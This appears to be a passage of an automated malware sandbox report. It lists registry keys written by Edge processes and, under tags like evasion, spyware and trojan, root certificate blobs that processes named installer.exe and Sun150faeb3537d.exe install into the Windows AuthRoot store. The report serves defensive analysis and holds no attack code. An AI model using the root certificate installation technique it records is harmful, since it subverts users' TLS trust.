Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "797"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.mcafee.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000007276f24e6c831bde6408043f4f75cf6ed23ace2e40c6deeb0190f6bbc7ee82fa7a9e52a4572bb5e0cab088ff40f8ff3b3951c65ce50f406efb2a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "962"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "665"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Male"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com\Total = "241"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\OneTimeCleanup = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "German Phone Converter"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000008f4ea4b217afc47899699ce140a6da2307ac7f9bbb66611b94d279c100bb678fb67da8109cc1b608e7514ab679ca9ce0fc382d498e86540f4ebf	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mj22.xyz	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mj22.xyz\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mj22.xyz\NumberOfSubdomai = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mcafee.com	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 4472032314a8d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\c1033.fe"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun150faeb3537d.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun150faeb3537d.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
